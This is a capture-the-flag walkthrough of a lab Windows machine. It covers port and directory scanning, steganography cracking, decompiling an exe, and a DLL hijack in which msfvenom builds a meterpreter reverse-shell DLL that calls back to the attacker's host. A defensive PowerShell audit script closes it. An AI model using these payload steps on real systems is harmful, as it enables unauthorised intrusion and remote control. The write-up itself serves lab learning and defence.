
Thehackerslabs-Welcome To The Jungle

Author: HYH
A technology enthusiast focused on cybersecurity, penetration testing and CTF challenges, keen on recording hands-on experience, sharing tools and techniques, and committed to continual learning and growth.

Nmap

[root@Hacking] /home/kali/Jungle  
❯ nmap 192.168.55.161 -A -p-                                                                     

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: Welcome to the Jungle - The Hex Guns
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC

Dirsearch

[root@Hacking] /home/kali/Jungle  
❯ feroxbuster -u http://192.168.55.161 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
                                                                                                                                                
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.55.161
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET       29l       94w     1251c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        2l       10w      160c http://192.168.55.161/img => http://192.168.55.161/img/
200      GET       29l      124w     1209c http://192.168.55.161/index.php
200      GET       42l      168w     1915c http://192.168.55.161/albums.php
301      GET        2l       10w      162c http://192.168.55.161/media => http://192.168.55.161/media/
200      GET      126l      218w     2089c http://192.168.55.161/css/styles.css
200      GET        7l       13w      189c http://192.168.55.161/header.php
200      GET     8487l    45658w  3909539c http://192.168.55.161/img/axl.png
200      GET       29l      124w     1209c http://192.168.55.161/
200      GET        3l       11w       81c http://192.168.55.161/footer.php
403      GET       29l       91w     1232c http://192.168.55.161/css/
301      GET        2l       10w      160c http://192.168.55.161/css => http://192.168.55.161/css/
200      GET       29l      124w     1209c http://192.168.55.161/Index.php
301      GET        2l       10w      162c http://192.168.55.161/Media => http://192.168.55.161/Media/
200      GET     7731l    46736w  3824296c http://192.168.55.161/img/digital-destruction.png
200      GET     9162l    55315w  4712528c http://192.168.55.161/img/paradise-404.png
200      GET     8321l    48830w  4266377c http://192.168.55.161/img/neon-rebellion.png
301      GET        2l       10w      160c http://192.168.55.161/IMG => http://192.168.55.161/IMG/
200      GET        7l       13w      189c http://192.168.55.161/Header.php
200      GET       29l      124w     1209c http://192.168.55.161/INDEX.php
301      GET        2l       10w      160c http://192.168.55.161/CSS => http://192.168.55.161/CSS/
301      GET        2l       10w      160c http://192.168.55.161/Img => http://192.168.55.161/Img/
200      GET        3l       11w       81c http://192.168.55.161/Footer.php
301      GET        2l       10w      162c http://192.168.55.161/MEDIA => http://192.168.55.161/MEDIA/
200      GET        7l       13w      189c http://192.168.55.161/HEADER.php
200      GET        3l       11w       81c http://192.168.55.161/FOOTER.php
[####################] - 5m   1984940/1984940 0s      found:25      errors:0      
[####################] - 5m    220546/220546  722/s   http://192.168.55.161/ 
[####################] - 5m    220546/220546  721/s   http://192.168.55.161/img/ 
[####################] - 5m    220546/220546  720/s   http://192.168.55.161/media/ 
[####################] - 5m    220546/220546  721/s   http://192.168.55.161/css/ 
[####################] - 5m    220546/220546  722/s   http://192.168.55.161/Media/ 
[####################] - 5m    220546/220546  723/s   http://192.168.55.161/IMG/ 
[####################] - 5m    220546/220546  728/s   http://192.168.55.161/CSS/ 
[####################] - 5m    220546/220546  729/s   http://192.168.55.161/Img/ 
[####################] - 5m    220546/220546  797/s   http://192.168.55.161/MEDIA/

Scanning the /media directory specifically turns up an archive:

[root@Hacking] /home/kali/Jungle  
❯ feroxbuster -u http://192.168.55.161/media -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x zip
                                                                                                                                                
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.55.161/media
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [zip]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET       29l       94w     1251c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        2l       10w      162c http://192.168.55.161/media => http://192.168.55.161/media/
200      GET       11l       74w     5642c http://192.168.55.161/media/songs.zip
200      GET       11l       74w     5642c http://192.168.55.161/media/Songs.zip
[####################] - 35s   220547/220547  0s      found:3       errors:0      
[####################] - 34s   220546/220546  6468/s  http://192.168.55.161/media/                                                              

Stegseek

Unpack it:

[root@Hacking] /home/kali/Jungle  
❯ unzip songs.zip               
Archive:  songs.zip
  inflating: digital_destruction.txt  
  inflating: neon_rebellion.txt      
  inflating: paradaise_404.txt       
  inflating: solo_final.wav          

[root@Hacking] /home/kali/Jungle  
❯ ls
digital_destruction.txt  neon_rebellion.txt  paradaise_404.txt  solo_final.wav  songs.zip

[root@Hacking] /home/kali/Jungle  
❯ cat digital_destruction.txt                        
Binary burns through the wires,
1s and 0s flying higher...
# nothing special here

[root@Hacking] /home/kali/Jungle  
❯ cat neon_rebellion.txt                      
Rise against the static tide,
firewalls can't stop our ride.

[root@Hacking] /home/kali/Jungle  
❯ cat paradaise_404.txt                                          
They tried to hide, but we still found,
The jungle echoes with a sound...

There's always one password we’ve used since the first rehearsal...

Here I fed the page source to ChatGPT to generate password combinations, and the passphrase turned out to be thehexguns:

[root@Hacking] /home/kali/Jungle  
❯ stegseek solo_final.wav pass.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "thehexguns"
[i] Original filename: "password.txt".
[i] Extracting to "solo_final.wav.out".

[root@Hacking] /home/kali/Jungle  
❯ cat solo_final.wav.out
Password:sweetjungle2025
URL:theh3xgun5

IDA

That yields a password string and a URL, but the username is not admin.

The page source reveals that the username is slash.
Logging in at that URL lets you download an exe file.
Drag it into IDA to decompile it.
It reveals user credentials that allow a remote login.

DLL Hijack

Inside the HexGuns directory, config.dll is missing.

Decompiling setlist_uploader.exe also shows that it requires config.dll,
so generate a malicious DLL of our own to get a reverse connection:

[root@Hacking] /home/kali/Jungle  
❯ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.55.4 LPORT=4444 -f dll -o config.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 9216 bytes
Saved as: config.dll

Upload it into that directory.

Then wait for it to be executed (or reboot the machine manually) and you get a meterpreter session.
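The hijack above only works because two conditions hold on the target: the application resolves a DLL name that is absent from its own directory, and a low-privilege user can write into that directory. The following PowerShell script is an added example, not code from this writeup or from TheHackersLabs, that audits a host for exactly those two conditions; the install path C:\HexGuns, the DLL name config.dll and the list of low-privilege principals are assumptions to adjust for the host being checked.

```powershell
# Added example (not part of the original writeup): audit an application
# directory for the preconditions of a DLL-hijacking plant.
#   1. a DLL the application loads from its own directory that is missing
#      (the slot an attacker fills), or present but unsigned
#   2. write access on that directory for low-privilege principals
# $AppDir and $Dlls are assumptions modelled on the writeup; adjust them.

param(
    [string]$AppDir = 'C:\HexGuns',       # assumed install directory
    [string[]]$Dlls = @('config.dll')     # assumed DLL names the exe resolves from its own directory
)

# Principals that should never hold write rights on an application directory.
$lowPrivPrincipals = @(
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'Everyone',
    'NT AUTHORITY\INTERACTIVE'
)

# Any one of these rights lets a principal drop or replace a file in the directory.
$writeMask = [System.Security.AccessControl.FileSystemRights]::CreateFiles -bor
             [System.Security.AccessControl.FileSystemRights]::Write -bor
             [System.Security.AccessControl.FileSystemRights]::Modify -bor
             [System.Security.AccessControl.FileSystemRights]::FullControl

if (-not (Test-Path -LiteralPath $AppDir -PathType Container)) {
    Write-Error "Directory $AppDir does not exist"
    exit 1
}

$findings = @()

# 1. Missing or unsigned DLLs. The loader searches the application directory
#    first, so a name that is referenced but absent is an open slot.
foreach ($dll in $Dlls) {
    $path = Join-Path $AppDir $dll
    if (-not (Test-Path -LiteralPath $path -PathType Leaf)) {
        $findings += "MISSING  $path (referenced by the application; open slot for a planted DLL)"
        continue
    }
    $sig = Get-AuthenticodeSignature -FilePath $path
    if ($sig.Status -ne 'Valid') {
        # Unsigned is not proof of tampering, but a freshly dropped DLL will look like this.
        $findings += "UNSIGNED $path (signature status: $($sig.Status))"
    }
}

# 2. Writable directory: every Allow ACE that grants a write-class right
#    to one of the low-privilege principals.
$acl = Get-Acl -LiteralPath $AppDir
foreach ($ace in $acl.Access) {
    if ($ace.AccessControlType -ne 'Allow') { continue }
    if ($lowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
    if (($ace.FileSystemRights -band $writeMask) -ne 0) {
        $findings += "WRITABLE $AppDir by $($ace.IdentityReference.Value) ($($ace.FileSystemRights))"
    }
}

if ($findings.Count -eq 0) {
    Write-Output "OK: no missing/unsigned DLLs and no low-privilege write access in $AppDir"
} else {
    $findings | ForEach-Object { Write-Output $_ }
    Write-Output ''
    Write-Output 'Remediation: reset the directory ACL so only administrators and SYSTEM can write:'
    Write-Output "  icacls `"$AppDir`" /inheritance:r /grant:r `"BUILTIN\Administrators:(OI)(CI)F`" `"NT AUTHORITY\SYSTEM:(OI)(CI)F`" `"BUILTIN\Users:(OI)(CI)RX`""
}
```

Run it from an elevated prompt as `.\Check-DllHijack.ps1 -AppDir 'C:\HexGuns' -Dlls config.dll`. Fixing the ACL removes the write path; shipping the DLL the executable actually needs (or loading it from an absolute path) removes the open slot. For detection after the fact, Sysmon Event ID 7 (image loaded) with an unsigned DLL loaded from an application directory is the event to alert on.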
